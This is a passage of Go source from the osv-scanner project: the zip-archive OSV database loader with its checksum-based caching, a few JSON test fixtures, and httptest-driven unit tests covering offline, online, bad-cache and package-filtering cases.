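		if fromEnv, envSet := os.LookupEnv(envKeyLocalDBCacheDirectory); envSet {
			localDBPath = fromEnv
		}
	}

	implicitPath := localDBPath == ""

	// if we're implicitly picking a path, use the user cache directory if available
	if implicitPath {
		cacheDir, err := os.UserCacheDir()
		if err != nil {
			cacheDir = os.TempDir()
		}

		localDBPath = cacheDir
	}

	dbDir := path.Join(localDBPath, "osv-scanner")

	err := os.MkdirAll(dbDir, 0750)
	if err == nil {
		return dbDir, nil
	}

	// if we're implicitly picking a path, try the temp directory before giving up
	if implicitPath && localDBPath != os.TempDir() {
		return setupLocalDBDirectory(os.TempDir())
	}

	return "", err
}

================================================
FILE: internal/clients/clientimpl/localmatcher/testdata/db/file.json
================================================
{ "id": "GHSA-1234" }

================================================
FILE: internal/clients/clientimpl/localmatcher/testdata/db/file.yaml
================================================
id: GHSA-5678

================================================
FILE: internal/clients/clientimpl/localmatcher/testdata/db/nested-1/osv-1.json
================================================
{ "id": "OSV-1" }

================================================
FILE: internal/clients/clientimpl/localmatcher/testdata/db/nested-2/invalid.json
================================================
{ "id": "OSV-2"

================================================
FILE: internal/clients/clientimpl/localmatcher/testdata/db/nested-2/osv-2.json
================================================
{ "id": "OSV-2" }

================================================
FILE: internal/clients/clientimpl/localmatcher/zip.go
================================================
package localmatcher

import (
	"archive/zip"
	"context"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/crc32"
	"io"
	"net/http"
	"os"
	"path"
	"slices"
	"strings"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/imodels"
	"github.com/google/osv-scanner/v2/internal/utility/vulns"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"github.com/tidwall/gjson"
	"google.golang.org/protobuf/encoding/protojson"
)

// ZipDB is an OSV database backed by a zip archive that is cached on disk.
type ZipDB struct {
	// the name of the database
	Name string
	// the url that the zip archive was downloaded from
	ArchiveURL string
	// whether this database should make any network requests
	Offline bool
	// the path to the zip archive on disk
	StoredAt string
	// the vulnerabilities that are loaded into this database
	Vulnerabilities []*osvschema.Vulnerability
	// User agent to query with
	UserAgent string

	// whether this database only has some of the advisories
	// loaded from the underlying zip file
	Partial bool
}

var ErrOfflineDatabaseNotFound = errors.New("no offline version of the OSV database is available")

// fetchRemoteArchiveCRC32CHash asks the host for the CRC32C checksum of the
// archive at url with a HEAD request, reading it from the first X-Goog-Hash
// header value that starts with "crc32c=".
//
// An error is returned when the request fails, the status is not 200, no such
// header value is present, or the value is not the base64 form of exactly
// four bytes.
func fetchRemoteArchiveCRC32CHash(ctx context.Context, url string) (uint32, error) {
	req, err := http.NewRequestWithContext(ctx, http.MethodHead, url, nil)
	if err != nil {
		return 0, err
	}

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return 0, err
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return 0, fmt.Errorf("db host returned %s", resp.Status)
	}

	for _, value := range resp.Header.Values("X-Goog-Hash") {
		encoded, ok := strings.CutPrefix(value, "crc32c=")
		if !ok {
			continue
		}

		sum, err := base64.StdEncoding.DecodeString(encoded)
		if err != nil {
			return 0, fmt.Errorf("could not decode crc32c= checksum: %w", err)
		}

		// binary.BigEndian.Uint32 panics on fewer than four bytes, and the
		// header is data supplied by the remote end, so reject any value that
		// is not exactly one checksum long instead of crashing the scan
		if len(sum) != crc32.Size {
			return 0, fmt.Errorf("could not decode crc32c= checksum: expected %d bytes but got %d", crc32.Size, len(sum))
		}

		return binary.BigEndian.Uint32(sum), nil
	}

	return 0, errors.New("could not find crc32c= checksum")
}

// fetchLocalArchiveCRC32CHash computes the CRC32C (Castagnoli) checksum of
// everything that can still be read from f. The read position of f is left at
// the end of the file.
func fetchLocalArchiveCRC32CHash(f *os.File) (uint32, error) {
	hasher := crc32.New(crc32.MakeTable(crc32.Castagnoli))

	if _, err := io.Copy(hasher, f); err != nil {
		return 0, err
	}

	return hasher.Sum32(), nil
}

// fetchZip returns an open handle on the archive for this database, which the
// caller must close.
//
// When offline, the cached archive is returned as-is, or
// ErrOfflineDatabaseNotFound if it cannot be opened. Otherwise the cached
// archive is reused only if its CRC32C equals the one the host reports; in
// every other case the archive is downloaded and the cache file overwritten.
//
// NOTE(review): the checksum comparison is a freshness check. CRC32C detects
// accidental differences, it does not authenticate the content, and a freshly
// downloaded body is not compared against the advertised checksum at all, so
// the integrity of the advisories rests on the TLS connection to the host and
// on the permissions of the cache directory.
func (db *ZipDB) fetchZip(ctx context.Context) (*os.File, error) {
	cached, openErr := os.Open(db.StoredAt)

	if db.Offline {
		if openErr != nil {
			return nil, ErrOfflineDatabaseNotFound
		}

		return cached, nil
	}

	if openErr == nil {
		remoteHash, err := fetchRemoteArchiveCRC32CHash(ctx, db.ArchiveURL)
		if err != nil {
			// the handle is not handed to the caller, so release it here
			_ = cached.Close()

			return nil, err
		}

		localHash, err := fetchLocalArchiveCRC32CHash(cached)
		if err != nil {
			_ = cached.Close()

			return nil, err
		}

		if remoteHash == localHash {
			return cached, nil
		}

		// the cache is stale: close it before the file is truncated and
		// rewritten below, rather than leaking the descriptor
		_ = cached.Close()
	}

	req, err := http.NewRequestWithContext(ctx, http.MethodGet, db.ArchiveURL, nil)
	if err != nil {
		return nil, fmt.Errorf("could not retrieve OSV database archive: %w", err)
	}

	if db.UserAgent != "" {
		req.Header.Set("User-Agent", db.UserAgent)
	}

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return nil, fmt.Errorf("could not retrieve OSV database archive: %w", err)
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("db host returned %s", resp.Status)
	}

	if err := os.MkdirAll(path.Dir(db.StoredAt), 0750); err != nil {
		return nil, fmt.Errorf("could not create cache directory: %w", err)
	}

	// NOTE(review): the archive is written in place, so an interrupted download
	// leaves a truncated file at StoredAt; a later offline run would open it
	// and fail when the zip is read. Writing to a temporary file and renaming
	// it would avoid that.
	fresh, err := os.OpenFile(db.StoredAt, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644)
	if err != nil {
		return nil, fmt.Errorf("could not create cache file: %w", err)
	}

	if _, err := io.Copy(fresh, resp.Body); err != nil {
		_ = fresh.Close()

		return nil, fmt.Errorf("could not write cache file: %w", err)
	}

	_, _ = fresh.Seek(0, io.SeekStart)

	return fresh, nil
}

// mightAffectPackagesBytes reports whether the raw OSV JSON in content names
// any of the given packages, either as an affected package name or as the
// repository of an affected range.
//
// It is a cheap pre-filter used before the advisory is fully parsed: package
// names are compared as exact strings regardless of ecosystem, and
// repositories are compared after vulns.NormalizeRepo.
//
// NOTE(review): advisories rejected here are never seen by the real matcher,
// so this presumably must not be stricter than vulns.IsAffected (for example
// about name casing) - confirm, as a mismatch would hide findings.
func mightAffectPackagesBytes(content []byte, names []string) bool {
	affected := gjson.GetBytes(content, "affected")

	for _, pkgName := range affected.Get("#.package.name").Array() {
		if slices.Contains(names, pkgName.String()) {
			return true
		}
	}

	for _, repos := range affected.Get("#.ranges.#.repo").Array() {
		for _, repo := range repos.Array() {
			repoName := vulns.NormalizeRepo(repo.String())

			// "name" will be the git repository in the case of the GIT ecosystem
			sameRepo := func(name string) bool {
				return repoName == vulns.NormalizeRepo(name)
			}

			if slices.ContainsFunc(names, sameRepo) {
				return true
			}
		}
	}

	return false
}

// Loads the given zip file into the database as an OSV.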
// It is assumed that the file is JSON and in the working directory of the db
//
// An entry that cannot be opened, read or parsed is skipped with a warning and
// the load carries on, so a damaged entry reduces what the database knows
// about without failing the scan.
//
// NOTE(review): the entry is read fully into memory with no upper bound on its
// uncompressed size; the archive is assumed to come from the configured host
// or from a cache directory only this user can write to.
func (db *ZipDB) loadZipFile(zipFile *zip.File, names []string) {
	entry, err := zipFile.Open()
	if err != nil {
		cmdlogger.Warnf("Could not read %s: %v", zipFile.Name, err)

		return
	}
	defer entry.Close()

	raw, err := io.ReadAll(entry)
	if err != nil {
		cmdlogger.Warnf("Could not read %s: %v", zipFile.Name, err)

		return
	}

	// if we have been provided a list of package names, only load advisories
	// that might actually affect those packages, rather than all advisories
	filtering := len(names) > 0
	if filtering && !mightAffectPackagesBytes(raw, names) {
		return
	}

	advisory := &osvschema.Vulnerability{}

	err = protojson.Unmarshal(raw, advisory)
	if err != nil {
		cmdlogger.Warnf("%s is not a valid JSON file: %v", zipFile.Name, err)

		return
	}

	db.Vulnerabilities = append(db.Vulnerabilities, advisory)
}

// load fetches a zip archive of the OSV database and loads known vulnerabilities
// from it (which are assumed to be in json files following the OSV spec).
//
// If a list of package names is provided, then only advisories with at least
// one affected entry for a listed package will be loaded.
//
// Internally, the archive is cached on disk, and a new version is only
// downloaded when the CRC32C checksum reported by the host differs from the
// checksum of the cached file (see fetchZip).
func (db *ZipDB) load(ctx context.Context, names []string) error {
	// start from an empty (non-nil) list so that a reload never keeps stale entries
	db.Vulnerabilities = []*osvschema.Vulnerability{}

	archive, err := db.fetchZip(ctx)
	if err != nil {
		return err
	}
	defer archive.Close()

	info, err := archive.Stat()
	if err != nil {
		return err
	}

	reader, err := zip.NewReader(archive, info.Size())
	if err != nil {
		return fmt.Errorf("could not read OSV database archive: %w", err)
	}

	// Read all the files from the zip archive; anything that is not a .json
	// file is ignored
	for _, entry := range reader.File {
		if strings.HasSuffix(entry.Name, ".json") {
			db.loadZipFile(entry, names)
		}
	}

	return nil
}

// NewZippedDB creates the database called name and loads it from the archive
// cached under dbBasePath, downloading the archive from url first unless
// offline is set.
//
// When pkgs is not empty only advisories that might affect those packages are
// loaded and the database is marked Partial.
//
// NOTE(review): name is joined into the cache path as given; presumably every
// caller passes a known ecosystem name and never a value containing path
// separators - confirm against callers.
func NewZippedDB(ctx context.Context, dbBasePath, name, url, userAgent string, offline bool, pkgs []*extractor.Package) (*ZipDB, error) {
	// we only fully load the database if we're not provided a list of packages
	partial := len(pkgs) != 0

	db := &ZipDB{
		Name:       name,
		ArchiveURL: url,
		Offline:    offline,
		StoredAt:   path.Join(dbBasePath, name, "all.zip"),
		UserAgent:  userAgent,
		Partial:    partial,
	}

	// map the packages to their names ahead of loading,
	// to make things simpler and reduce double working
	names := make([]string, len(pkgs))
	for i, pkg := range pkgs {
		names[i] = imodels.Name(pkg)
	}

	err := db.load(ctx, names)
	if err != nil {
		return nil, fmt.Errorf("unable to fetch OSV database: %w", err)
	}

	return db, nil
}

// VulnerabilitiesAffectingPackage returns the vulnerabilities that affect the provided package
//
// TODO: Move this to another file.
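func VulnerabilitiesAffectingPackage(allVulns []*osvschema.Vulnerability, pkg *extractor.Package) []*osvschema.Vulnerability {
	var affecting []*osvschema.Vulnerability

	for _, candidate := range allVulns {
		// withdrawn advisories are never reported
		if candidate.GetWithdrawn() != nil {
			continue
		}

		if !vulns.IsAffected(candidate, pkg) {
			continue
		}

		// the same advisory can be present more than once, so only keep the first
		if vulns.Include(affecting, candidate) {
			continue
		}

		affecting = append(affecting, candidate)
	}

	return affecting
}

================================================
FILE: internal/clients/clientimpl/localmatcher/zip_test.go
================================================
package localmatcher_test

import (
	"archive/zip"
	"bytes"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"hash/crc32"
	"net/http"
	"net/http/httptest"
	"os"
	"path"
	"sort"
	"testing"

	"github.com/google/go-cmp/cmp"
	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher"
	"github.com/google/osv-scanner/v2/internal/testutility"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"google.golang.org/protobuf/encoding/protojson"
	"google.golang.org/protobuf/testing/protocmp"
)

const userAgent = "osv-scanner_test/" + version.OSVVersion

// expectDBToHaveOSVs fails the test unless db holds exactly the advisories in
// expect, ignoring order. Both slices are sorted in place by id.
func expectDBToHaveOSVs(
	t *testing.T,
	db *localmatcher.ZipDB,
	expect []*osvschema.Vulnerability,
) {
	t.Helper()

	got := db.Vulnerabilities

	sort.Slice(got, func(i, j int) bool {
		return got[i].GetId() < got[j].GetId()
	})
	sort.Slice(expect, func(i, j int) bool {
		return expect[i].GetId() < expect[j].GetId()
	})

	if diff := cmp.Diff(expect, got, protocmp.Transform()); diff != "" {
		t.Errorf("db is missing some vulnerabilities (-want +got):\n%s", diff)
	}
}

// cacheWrite stores cache as the archive at storedAt, creating the directory first.
func cacheWrite(t *testing.T, storedAt string, cache []byte) {
	t.Helper()

	err := os.MkdirAll(path.Dir(storedAt), 0750)

	if err == nil {
		//nolint:gosec // being world readable is fine
		err = os.WriteFile(storedAt, cache, 0644)
	}

	if err != nil {
		t.Errorf("unexpected error with cache: %v", err)
	}
}

// cacheWriteBad stores arbitrary text at storedAt in place of a zip archive.
func cacheWriteBad(t *testing.T, storedAt string, contents string) {
	t.Helper()

	err := os.MkdirAll(path.Dir(storedAt), 0750)

	if err == nil {
		//nolint:gosec // being world readable is fine
		err = os.WriteFile(storedAt, []byte(contents), 0644)
	}

	if err != nil {
		t.Errorf("unexpected error with cache: %v", err)
	}
}

// createZipServer starts a test server that is shut down when the test ends.
func createZipServer(t *testing.T, handler http.HandlerFunc) *httptest.Server {
	t.Helper()

	ts := httptest.NewServer(handler)
	t.Cleanup(ts.Close)

	return ts
}

// computeCRC32CHash returns the checksum of data in the form the db host
// reports it: base64 of the big-endian CRC32C.
func computeCRC32CHash(t *testing.T, data []byte) string {
	t.Helper()

	sum := crc32.Checksum(data, crc32.MakeTable(crc32.Castagnoli))

	return base64.StdEncoding.EncodeToString(binary.BigEndian.AppendUint32([]byte{}, sum))
}

// writeOSVsZip responds with a zip of osvs and its matching x-goog-hash header.
func writeOSVsZip(t *testing.T, w http.ResponseWriter, osvs map[string]*osvschema.Vulnerability) (int, error) {
	t.Helper()

	archive := zipOSVs(t, osvs)

	w.Header().Add("x-goog-hash", "crc32c="+computeCRC32CHash(t, archive))

	return w.Write(archive)
}

// zipOSVs builds a zip archive with one JSON entry per advisory, keyed by path.
//
// The map is iterated in no fixed order, so two calls with the same advisories
// need not produce the same bytes (or checksum).
func zipOSVs(t *testing.T, osvs map[string]*osvschema.Vulnerability) []byte {
	t.Helper()

	buf := new(bytes.Buffer)
	writer := zip.NewWriter(buf)

	for fp, osv := range osvs {
		data, err := protojson.Marshal(osv)
		if err != nil {
			t.Fatalf("could not marshal %v: %v", osv, err)
		}

		entry, err := writer.Create(fp)
		if err != nil {
			t.Fatal(err)
		}

		if _, err = entry.Write(data); err != nil {
			t.Fatal(err)
		}
	}

	if err := writer.Close(); err != nil {
		t.Fatal(err)
	}

	return buf.Bytes()
}

//nolint:unparam // name might get changed at some point
func determineStoredAtPath(dbBasePath, name string) string {
	return path.Join(dbBasePath, name, "all.zip")
}

// Offline without a cached archive must fail without touching the network.
func TestNewZippedDB_Offline_WithoutCache(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(_ http.ResponseWriter, _ *http.Request) {
		t.Errorf("a server request was made when running offline")
	})

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, true, nil)

	if !errors.Is(err, localmatcher.ErrOfflineDatabaseNotFound) {
		t.Errorf("expected \"%v\" error but got \"%v\"", localmatcher.ErrOfflineDatabaseNotFound, err)
	}
}

// Offline with a cached archive must load it without touching the network.
func TestNewZippedDB_Offline_WithCache(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{
		{Id: "GHSA-1"},
		{Id: "GHSA-2"},
		{Id: "GHSA-3"},
		{Id: "GHSA-4"},
		{Id: "GHSA-5"},
	}

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(_ http.ResponseWriter, _ *http.Request) {
		t.Errorf("a server request was made when running offline")
	})

	cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{
		"GHSA-1.json": {Id: "GHSA-1"},
		"GHSA-2.json": {Id: "GHSA-2"},
		"GHSA-3.json": {Id: "GHSA-3"},
		"GHSA-4.json": {Id: "GHSA-4"},
		"GHSA-5.json": {Id: "GHSA-5"},
	}))

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, true, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// A response body that is not a zip archive must be reported as an error.
func TestNewZippedDB_BadZip(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = w.Write([]byte("this is not a zip"))
	})

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err == nil {
		t.Errorf("expected an error but did not get one")
	}
}

// An archive url the HTTP client cannot fetch must be reported as an error.
func TestNewZippedDB_UnsupportedProtocol(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", "file://hello-world", userAgent, false, nil)

	if err == nil {
		t.Errorf("expected an error but did not get one")
	}
}

// Online without a cache downloads the archive and loads all of it.
func TestNewZippedDB_Online_WithoutCache(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{
		{Id: "GHSA-1"},
		{Id: "GHSA-2"},
		{Id: "GHSA-3"},
		{Id: "GHSA-4"},
		{Id: "GHSA-5"},
	}

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {Id: "GHSA-1"},
			"GHSA-2.json": {Id: "GHSA-2"},
			"GHSA-3.json": {Id: "GHSA-3"},
			"GHSA-4.json": {Id: "GHSA-4"},
			"GHSA-5.json": {Id: "GHSA-5"},
		})
	})

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// Without a cache the checksum header is never consulted, so a download that
// carries no x-goog-hash header is still accepted.
func TestNewZippedDB_Online_WithoutCacheAndNoHashHeader(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{
		{Id: "GHSA-1"},
		{Id: "GHSA-2"},
		{Id: "GHSA-3"},
		{Id: "GHSA-4"},
		{Id: "GHSA-5"},
	}

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = w.Write(zipOSVs(t, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {Id: "GHSA-1"},
			"GHSA-2.json": {Id: "GHSA-2"},
			"GHSA-3.json": {Id: "GHSA-3"},
			"GHSA-4.json": {Id: "GHSA-4"},
			"GHSA-5.json": {Id: "GHSA-5"},
		}))
	})

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// A cache whose checksum matches the host's is reused after a single HEAD request.
func TestNewZippedDB_Online_WithSameCache(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{
		{Id: "GHSA-1"},
		{Id: "GHSA-2"},
		{Id: "GHSA-3"},
	}

	testDir := testutility.CreateTestDir(t)

	cache := zipOSVs(t, map[string]*osvschema.Vulnerability{
		"GHSA-1.json": {Id: "GHSA-1"},
		"GHSA-2.json": {Id: "GHSA-2"},
		"GHSA-3.json": {Id: "GHSA-3"},
	})

	ts := createZipServer(t, func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodHead {
			t.Errorf("unexpected %s request", r.Method)
		}

		w.Header().Add("x-goog-hash", "crc32c="+computeCRC32CHash(t, cache))

		_, _ = w.Write(cache)
	})

	cacheWrite(t, determineStoredAtPath(testDir, "my-db"), cache)

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// A cache whose checksum differs from the host's is replaced by a download.
func TestNewZippedDB_Online_WithDifferentCache(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{
		{Id: "GHSA-1"},
		{Id: "GHSA-2"},
		{Id: "GHSA-3"},
		{Id: "GHSA-4"},
		{Id: "GHSA-5"},
	}

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {Id: "GHSA-1"},
			"GHSA-2.json": {Id: "GHSA-2"},
			"GHSA-3.json": {Id: "GHSA-3"},
			"GHSA-4.json": {Id: "GHSA-4"},
			"GHSA-5.json": {Id: "GHSA-5"},
		})
	})

	cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{
		"GHSA-1.json": {Id: "GHSA-1"},
		"GHSA-2.json": {Id: "GHSA-2"},
		"GHSA-3.json": {Id: "GHSA-3"},
	}))

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// With a cache present, a failing HEAD request is an error rather than a
// silent fallback to the cached archive.
func TestNewZippedDB_Online_WithCacheButBadHeadResponse(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		w.WriteHeader(http.StatusBadRequest)
	})

	cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{
		"GHSA-1.json": {Id: "GHSA-1"},
		"GHSA-2.json": {Id: "GHSA-2"},
		"GHSA-3.json": {Id: "GHSA-3"},
	}))

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err == nil {
		t.Errorf("expected an error but did not get one")
	}
}

// With a cache present, a checksum header that cannot be decoded is an error.
func TestNewZippedDB_Online_WithCacheButBadHashHeader(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		// the header has to be set before the body is written: net/http ignores
		// header changes made after the first Write, which would turn this into
		// a second copy of the "no hash header" test below
		w.Header().Add("x-goog-hash", "crc32c=bad-value")

		_, _ = w.Write(zipOSVs(t, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {Id: "GHSA-1"},
			"GHSA-2.json": {Id: "GHSA-2"},
			"GHSA-3.json": {Id: "GHSA-3"},
			"GHSA-4.json": {Id: "GHSA-4"},
			"GHSA-5.json": {Id: "GHSA-5"},
		}))
	})

	cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{
		"GHSA-1.json": {Id: "GHSA-1"},
		"GHSA-2.json": {Id: "GHSA-2"},
		"GHSA-3.json": {Id: "GHSA-3"},
	}))

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err == nil {
		t.Errorf("expected an error but did not get one")
	}
}

// With a cache present, a response without any checksum header is an error.
func TestNewZippedDB_Online_WithCacheButNoHashHeader(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = w.Write(zipOSVs(t, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {Id: "GHSA-1"},
			"GHSA-2.json": {Id: "GHSA-2"},
			"GHSA-3.json": {Id: "GHSA-3"},
			"GHSA-4.json": {Id: "GHSA-4"},
			"GHSA-5.json": {Id: "GHSA-5"},
		}))
	})

	cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{
		"GHSA-1.json": {Id: "GHSA-1"},
		"GHSA-2.json": {Id: "GHSA-2"},
		"GHSA-3.json": {Id: "GHSA-3"},
	}))

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err == nil {
		t.Errorf("expected an error but did not get one")
	}
}

// A cached file that is not a zip archive is replaced by a download.
func TestNewZippedDB_Online_WithBadCache(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{
		{Id: "GHSA-1"},
		{Id: "GHSA-2"},
		{Id: "GHSA-3"},
	}

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {Id: "GHSA-1"},
			"GHSA-2.json": {Id: "GHSA-2"},
			"GHSA-3.json": {Id: "GHSA-3"},
		})
	})

	cacheWriteBad(t, determineStoredAtPath(testDir, "my-db"), "this is not json!")

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// A non-200 answer to the download request must be reported as an error.
func TestNewZippedDB_Online_WithBadGetResponse(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodGet {
			w.WriteHeader(http.StatusMethodNotAllowed)

			return
		}

		_, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{})
	})

	_, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err == nil {
		t.Errorf("expected an error but did not get one")
	}
}

// Only entries with a .json suffix are loaded, whatever directory they are in.
func TestNewZippedDB_FileChecks(t *testing.T) {
	t.Parallel()

	osvs := []*osvschema.Vulnerability{{Id: "GHSA-1234"}, {Id: "GHSA-4321"}}

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{
			"file.json": {Id: "GHSA-1234"},
			// only files with .json suffix should be loaded
			"file.yaml": {Id: "GHSA-5678"},
			// (no longer) special case for the GH security database
			"advisory-database-main/advisories/unreviewed/file.json": {Id: "GHSA-4321"},
		})
	})

	db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	if db.Partial {
		t.Errorf("db is incorrectly marked as partially loaded")
	}

	expectDBToHaveOSVs(t, db, osvs)
}

// When packages are given, only advisories naming one of them (by package
// name or by normalized repository) are loaded and the db is marked partial.
func TestNewZippedDB_WithSpecificPackages(t *testing.T) {
	t.Parallel()

	testDir := testutility.CreateTestDir(t)

	ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) {
		_, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{
			"GHSA-1.json": {
				Id:       "GHSA-1",
				Affected: []*osvschema.Affected{},
			},
			"GHSA-2.json": {
				Id: "GHSA-2",
				Affected: []*osvschema.Affected{
					{Package: &osvschema.Package{Name: "pkg-1"}},
				},
			},
			"GHSA-3.json": {
				Id: "GHSA-3",
			},
			"GHSA-4.json": {
				Id: "GHSA-4",
				Affected: []*osvschema.Affected{
					{Package: &osvschema.Package{Name: "pkg-2"}},
				},
			},
			"GHSA-5.json": {
				Id: "GHSA-5",
				Affected: []*osvschema.Affected{
					{Package: &osvschema.Package{Name: "pkg-2"}},
					{Package: &osvschema.Package{Name: "pkg-1"}},
				},
			},
			"GHSA-6.json": {
				Id: "GHSA-6",
				Affected: []*osvschema.Affected{
					{Package: &osvschema.Package{Name: "pkg-3"}},
					{Package: &osvschema.Package{Name: "pkg-2"}},
				},
			},
			"GHSA-7.json": {
				Id: "GHSA-7",
				Affected: []*osvschema.Affected{
					{
						Ranges: []*osvschema.Range{
							{Type: osvschema.Range_SEMVER},
							{Type: osvschema.Range_GIT, Repo: "https://github.com/org/repo"},
						},
					},
				},
			},
			"GHSA-8.json": {
				Id: "GHSA-8",
				Affected: []*osvschema.Affected{
					{Ranges: []*osvschema.Range{{Type: osvschema.Range_SEMVER}}},
					{Ranges: []*osvschema.Range{{Type: osvschema.Range_GIT, Repo: "git://github.com/org/repo.git"}}},
				},
			},
			"GHSA-9.json": {
				Id: "GHSA-9",
				Affected: []*osvschema.Affected{
					{
						Ranges: []*osvschema.Range{
							{Type: osvschema.Range_GIT, Repo: "https://github.com/anotherorg/anotherrepo"},
						},
					},
				},
			},
		})
	})

	db, err := localmatcher.NewZippedDB(
		t.Context(),
		testDir,
		"my-db",
		ts.URL,
		userAgent,
		false,
		[]*extractor.Package{{Name: "pkg-1"}, {Name: "pkg-3"}, {Name: "https://github.com/org/repo"}},
	)

	if err != nil {
		t.Fatalf("unexpected error \"%v\"", err)
	}

	// we are loaded for specific packages
	if !db.Partial {
		t.Errorf("db is incorrectly marked as fully loaded")
	}

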